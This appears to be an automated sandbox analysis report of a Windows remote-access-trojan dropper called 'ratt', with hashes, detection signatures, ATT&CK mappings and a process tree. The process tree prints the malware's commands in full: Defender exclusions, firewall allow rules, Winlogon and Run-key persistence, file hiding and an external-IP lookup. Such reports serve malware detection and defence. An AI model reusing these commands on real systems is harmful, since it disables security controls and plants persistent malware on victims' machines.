1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf

Analysis

max time kernel
64s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230824-en
resource tags

arch:x64arch:x86image:win10v2004-20230824-enlocale:en-usos:windows10-2004-x64system
submitted
24-08-2023 19:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf.exe
Size

1.4MB
MD5

145675923656cb6cb0febc19195a6c47
SHA1

c71a0082e5fd902d1b5a6c051360eee94d3d6510
SHA256

1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf
SHA512

840c21008aad774a81cf97733e88228de43151a1a9a402b8c57d6d25db925fa7406c406fd207374b29f146d5215d314b9e449d78f20abab2bb6cb0271fcb40db
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
4468	netsh.exe
5076	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0008000000022ff8-100.dat	acprotect
behavioral1/files/0x0008000000022ff8-99.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
4568	7z.exe

Loads dropped DLL 1 IoCs

pid	Process
4568	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000022ff9-98.dat	upx
behavioral1/memory/4568-97-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x0007000000022ff9-96.dat	upx
behavioral1/files/0x0008000000022ff8-100.dat	upx
behavioral1/files/0x0008000000022ff8-99.dat	upx
behavioral1/memory/4568-101-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/4568-105-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3044	PING.EXE
3644	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1432	powershell.exe
1432	powershell.exe
1836	powershell.exe
1836	powershell.exe
2800	powershell.exe
2800	powershell.exe
1156	powershell.exe
1156	powershell.exe
3660	powershell.exe
3660	powershell.exe
1980	powershell.exe
1980	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2160	WMIC.exe
Token: SeSecurityPrivilege	2160	WMIC.exe
Token: SeTakeOwnershipPrivilege	2160	WMIC.exe
Token: SeLoadDriverPrivilege	2160	WMIC.exe
Token: SeSystemProfilePrivilege	2160	WMIC.exe
Token: SeSystemtimePrivilege	2160	WMIC.exe
Token: SeProfSingleProcessPrivilege	2160	WMIC.exe
Token: SeIncBasePriorityPrivilege	2160	WMIC.exe
Token: SeCreatePagefilePrivilege	2160	WMIC.exe
Token: SeBackupPrivilege	2160	WMIC.exe
Token: SeRestorePrivilege	2160	WMIC.exe
Token: SeShutdownPrivilege	2160	WMIC.exe
Token: SeDebugPrivilege	2160	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2160	WMIC.exe
Token: SeRemoteShutdownPrivilege	2160	WMIC.exe
Token: SeUndockPrivilege	2160	WMIC.exe
Token: SeManageVolumePrivilege	2160	WMIC.exe
Token: 33	2160	WMIC.exe
Token: 34	2160	WMIC.exe
Token: 35	2160	WMIC.exe
Token: 36	2160	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2160	WMIC.exe
Token: SeSecurityPrivilege	2160	WMIC.exe
Token: SeTakeOwnershipPrivilege	2160	WMIC.exe
Token: SeLoadDriverPrivilege	2160	WMIC.exe
Token: SeSystemProfilePrivilege	2160	WMIC.exe
Token: SeSystemtimePrivilege	2160	WMIC.exe
Token: SeProfSingleProcessPrivilege	2160	WMIC.exe
Token: SeIncBasePriorityPrivilege	2160	WMIC.exe
Token: SeCreatePagefilePrivilege	2160	WMIC.exe
Token: SeBackupPrivilege	2160	WMIC.exe
Token: SeRestorePrivilege	2160	WMIC.exe
Token: SeShutdownPrivilege	2160	WMIC.exe
Token: SeDebugPrivilege	2160	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2160	WMIC.exe
Token: SeRemoteShutdownPrivilege	2160	WMIC.exe
Token: SeUndockPrivilege	2160	WMIC.exe
Token: SeManageVolumePrivilege	2160	WMIC.exe
Token: 33	2160	WMIC.exe
Token: 34	2160	WMIC.exe
Token: 35	2160	WMIC.exe
Token: 36	2160	WMIC.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeIncreaseQuotaPrivilege	3404	WMIC.exe
Token: SeSecurityPrivilege	3404	WMIC.exe
Token: SeTakeOwnershipPrivilege	3404	WMIC.exe
Token: SeLoadDriverPrivilege	3404	WMIC.exe
Token: SeSystemProfilePrivilege	3404	WMIC.exe
Token: SeSystemtimePrivilege	3404	WMIC.exe
Token: SeProfSingleProcessPrivilege	3404	WMIC.exe
Token: SeIncBasePriorityPrivilege	3404	WMIC.exe
Token: SeCreatePagefilePrivilege	3404	WMIC.exe
Token: SeBackupPrivilege	3404	WMIC.exe
Token: SeRestorePrivilege	3404	WMIC.exe
Token: SeShutdownPrivilege	3404	WMIC.exe
Token: SeDebugPrivilege	3404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3404	WMIC.exe
Token: SeRemoteShutdownPrivilege	3404	WMIC.exe
Token: SeUndockPrivilege	3404	WMIC.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 3288 wrote to memory of 2176	3288	1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf.exe	85
PID 3288 wrote to memory of 2176	3288	1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf.exe	85
PID 3288 wrote to memory of 2176	3288	1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf.exe	85
PID 2176 wrote to memory of 3692	2176	cmd.exe	88
PID 2176 wrote to memory of 3692	2176	cmd.exe	88
PID 2176 wrote to memory of 3692	2176	cmd.exe	88
PID 3692 wrote to memory of 3356	3692	cmd.exe	89
PID 3692 wrote to memory of 3356	3692	cmd.exe	89
PID 3692 wrote to memory of 3356	3692	cmd.exe	89
PID 2176 wrote to memory of 4752	2176	cmd.exe	90
PID 2176 wrote to memory of 4752	2176	cmd.exe	90
PID 2176 wrote to memory of 4752	2176	cmd.exe	90
PID 4752 wrote to memory of 2160	4752	cmd.exe	91
PID 4752 wrote to memory of 2160	4752	cmd.exe	91
PID 4752 wrote to memory of 2160	4752	cmd.exe	91
PID 2176 wrote to memory of 1432	2176	cmd.exe	93
PID 2176 wrote to memory of 1432	2176	cmd.exe	93
PID 2176 wrote to memory of 1432	2176	cmd.exe	93
PID 2176 wrote to memory of 1836	2176	cmd.exe	94
PID 2176 wrote to memory of 1836	2176	cmd.exe	94
PID 2176 wrote to memory of 1836	2176	cmd.exe	94
PID 2176 wrote to memory of 2800	2176	cmd.exe	95
PID 2176 wrote to memory of 2800	2176	cmd.exe	95
PID 2176 wrote to memory of 2800	2176	cmd.exe	95
PID 2176 wrote to memory of 1156	2176	cmd.exe	96
PID 2176 wrote to memory of 1156	2176	cmd.exe	96
PID 2176 wrote to memory of 1156	2176	cmd.exe	96
PID 2176 wrote to memory of 3660	2176	cmd.exe	97
PID 2176 wrote to memory of 3660	2176	cmd.exe	97
PID 2176 wrote to memory of 3660	2176	cmd.exe	97
PID 2176 wrote to memory of 4568	2176	cmd.exe	98
PID 2176 wrote to memory of 4568	2176	cmd.exe	98
PID 2176 wrote to memory of 4568	2176	cmd.exe	98
PID 2176 wrote to memory of 1980	2176	cmd.exe	100
PID 2176 wrote to memory of 1980	2176	cmd.exe	100
PID 2176 wrote to memory of 1980	2176	cmd.exe	100
PID 1980 wrote to memory of 5076	1980	powershell.exe	101
PID 1980 wrote to memory of 5076	1980	powershell.exe	101
PID 1980 wrote to memory of 5076	1980	powershell.exe	101
PID 1980 wrote to memory of 4468	1980	powershell.exe	102
PID 1980 wrote to memory of 4468	1980	powershell.exe	102
PID 1980 wrote to memory of 4468	1980	powershell.exe	102
PID 1980 wrote to memory of 116	1980	powershell.exe	103
PID 1980 wrote to memory of 116	1980	powershell.exe	103
PID 1980 wrote to memory of 116	1980	powershell.exe	103
PID 116 wrote to memory of 3404	116	cmd.exe	104
PID 116 wrote to memory of 3404	116	cmd.exe	104
PID 116 wrote to memory of 3404	116	cmd.exe	104

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3348	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf.exe
"C:\Users\Admin\AppData\Local\Temp\1759ac0de651c898f856a74b0f811105ada2cca7041942b68b49fcedadb072cf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3692
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3660
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5076
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4468
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:116
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="MTMNHEOR" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2160
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:2372
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      PID:3088
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:4428
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 6
        6⤵
        Runs ping.exe
        
        PID:3644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 17 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 17 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:2340
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 17
        6⤵
        Runs ping.exe
        
        PID:3044
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:3348
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:3600
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
394.3MB

MD5
d199efcfeb1213c87fd2e0721daeb4f3

SHA1
1af8d9dc91ca7cb5bf2e51265eea248c9588b56f

SHA256
f8c83a013680a5319ea2e98d2ae07ed6936be980d5ca76d43ab2bc6e02c4a28a

SHA512
3ef478079449b587ceb9abf596403f1bc2e1248c08729d5a794f3a1ddb8d927204362df931da03f35cb6a19f622ef5b43a868c6fe63cb4852e33fe1362eb9ff8

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
93.9MB

MD5
933be28c36cb4aafd10495c241f40af8

SHA1
7e87949fc0f4781011dd36210471ba1f2c11e302

SHA256
b11cb72a53ccd057f4406cfb2ab0d31a133f10c4dbccdaf53b62c04f784cf7ca

SHA512
517e64fb39ff8d6ec333f73203909a5dd635a4c565a772878ee2bfcb27c2b300faa69673ed9a38a9a85bde1e669e4e33c8150196dcc1f1c1e8a76b57b72a8edc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
b7d6fa67e2a677ec9efbeb9d960243c0

SHA1
2fe278b3bd94d59b1bc94b4d6ce5d6ad74d290c5

SHA256
27ba78bba719cc036c7c57aa3512ee56c1bf9ed75359472da9b8b9dc4baf2380

SHA512
1bd54b8974727f8386b9b6e912f99265ef6c4ab7f867a6718e4df35b1950af6b890b1c518e56bc207ed88e6675ab58958b6e9e7b3b964a6a28df175d7a527e40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
05ecc8f8100c1e0ed9ae18f0fc972d77

SHA1
dbf774727cd81ff00a7c8ced05a10e4bcd90b6b6

SHA256
7ace6732c189a17db362dd9d7268dff7a5a9525f315e6c3d3e8eafa1e1f5cc62

SHA512
379ba25a797577f49b8f1ecf9bd890fe797431f6e39a31f8c535ba989ab7a83437080276a0babfd07b16fbb02a9f8549b93f0dd9e64c35ade9dea8d9f3f602f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
ff633b3222a5abfe0a7b43317fb3ba82

SHA1
00247caef98f832a36e60f5638449dda32b4d77d

SHA256
33f06cf01bfe5b0015c60fd1ae04ecc9e5c6412ee6ceb16e5c3a8121bdd96a49

SHA512
629661236d1de97cadf39c95b0bcb8771897cfbad15872d3b38e22c461effa0adc7079ed71e23c3791086166ec6736bc69f2cb64866b7855008de37f16b46c6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
600a18d40c6194a5d0a24ac872fa016a

SHA1
efe8cd50777db3845a441a43e38e7103cfee5ecd

SHA256
d6952fe773fda832d79e33eaed50aa0513e2f1a77af3e8e28fc1c0ab77fdc0e2

SHA512
b5d418ac5aa45f52e82858e04d505c28eae1405c4e0bba076ab4c735f4f24d9eb5ca7af53ae117b9f1b00a2bc52dca4dce6d3f0e652c39aaac2403520d126ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
4e4ea869c851eee111f893b7b917980d

SHA1
edce15f0665a8940f79bd48aff9508db27536420

SHA256
1c2a24e48d74df169f0196e28eeb650ab00b7dbb475b8fa3b1c5ad2479728d05

SHA512
c5f6837d4d41cc32966ab68e7cb3046c5ef977e9b680fff2c9e7505e466a99478c836c0cb699f304922948f487aba4050e7370605c4dc9809368fdb30fbffbbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fhrwcuzu.0gc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
59.0MB

MD5
cd78dd3935eefadc34061f1cd8142731

SHA1
65ab554b8bf064be1ce8f15d0ec83aafc7fce27d

SHA256
c8d871399123bcf9492ec276fb3966afb98346f03e5f8f98d0b40537ab315d73

SHA512
a881dc86f5c75c300d2cd522469a76c59c5aaa0709a4fed8aa9fe4899b2519f18242fd5980651951b3f9aa8b9c19c77d5de95b4bc7cf5f5e7ee49faac9bccb32

Download Submit
memory/1156-79-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/1156-77-0x0000000002B90000-0x0000000002BA0000-memory.dmp

Filesize
64KB

Download
memory/1156-66-0x0000000002B90000-0x0000000002BA0000-memory.dmp

Filesize
64KB

Download
memory/1156-65-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/1432-19-0x0000000005710000-0x0000000005776000-memory.dmp

Filesize
408KB

Download
memory/1432-16-0x0000000004F40000-0x0000000005568000-memory.dmp

Filesize
6.2MB

Download
memory/1432-17-0x0000000004DA0000-0x0000000004DC2000-memory.dmp

Filesize
136KB

Download
memory/1432-18-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/1432-32-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/1432-15-0x0000000004770000-0x00000000047A6000-memory.dmp

Filesize
216KB

Download
memory/1432-29-0x0000000005D70000-0x0000000005D8E000-memory.dmp

Filesize
120KB

Download
memory/1432-30-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/1432-14-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/1432-13-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/1836-33-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/1836-48-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/1836-34-0x0000000004650000-0x0000000004660000-memory.dmp

Filesize
64KB

Download
memory/1836-35-0x0000000004650000-0x0000000004660000-memory.dmp

Filesize
64KB

Download
memory/1836-47-0x0000000004650000-0x0000000004660000-memory.dmp

Filesize
64KB

Download
memory/1980-110-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/1980-136-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/1980-142-0x0000000007650000-0x000000000765E000-memory.dmp

Filesize
56KB

Download
memory/1980-145-0x000000007F7C0000-0x000000007F7D0000-memory.dmp

Filesize
64KB

Download
memory/1980-147-0x00000000077E0000-0x0000000007802000-memory.dmp

Filesize
136KB

Download
memory/1980-144-0x00000000076A0000-0x00000000076A8000-memory.dmp

Filesize
32KB

Download
memory/1980-141-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/1980-109-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/1980-155-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/1980-143-0x0000000007770000-0x000000000778A000-memory.dmp

Filesize
104KB

Download
memory/1980-148-0x00000000086D0000-0x0000000008C74000-memory.dmp

Filesize
5.6MB

Download
memory/1980-122-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/1980-123-0x000000007F7C0000-0x000000007F7D0000-memory.dmp

Filesize
64KB

Download
memory/1980-124-0x00000000072F0000-0x0000000007322000-memory.dmp

Filesize
200KB

Download
memory/1980-125-0x00000000704C0000-0x000000007050C000-memory.dmp

Filesize
304KB

Download
memory/1980-135-0x00000000066E0000-0x00000000066FE000-memory.dmp

Filesize
120KB

Download
memory/1980-140-0x00000000076D0000-0x0000000007766000-memory.dmp

Filesize
600KB

Download
memory/1980-137-0x0000000007AA0000-0x000000000811A000-memory.dmp

Filesize
6.5MB

Download
memory/1980-138-0x0000000007440000-0x000000000745A000-memory.dmp

Filesize
104KB

Download
memory/1980-139-0x00000000074A0000-0x00000000074AA000-memory.dmp

Filesize
40KB

Download
memory/2304-164-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

Filesize
64KB

Download
memory/2304-163-0x00000000005A0000-0x0000000000756000-memory.dmp

Filesize
1.7MB

Download
memory/2304-162-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/2800-51-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/2800-64-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/2800-49-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/2800-50-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/2800-62-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/3088-156-0x0000000004FF0000-0x0000000005082000-memory.dmp

Filesize
584KB

Download
memory/3088-157-0x0000000005250000-0x0000000005260000-memory.dmp

Filesize
64KB

Download
memory/3088-151-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/3088-152-0x0000000000430000-0x00000000005E6000-memory.dmp

Filesize
1.7MB

Download
memory/3088-153-0x0000000004EA0000-0x0000000004F3C000-memory.dmp

Filesize
624KB

Download
memory/3088-166-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/3088-160-0x0000000005250000-0x0000000005260000-memory.dmp

Filesize
64KB

Download
memory/3088-159-0x00000000746A0000-0x0000000074E50000-memory.dmp

Filesize
7.7MB

Download
memory/3088-158-0x00000000051B0000-0x00000000051BA000-memory.dmp

Filesize
40KB

Download
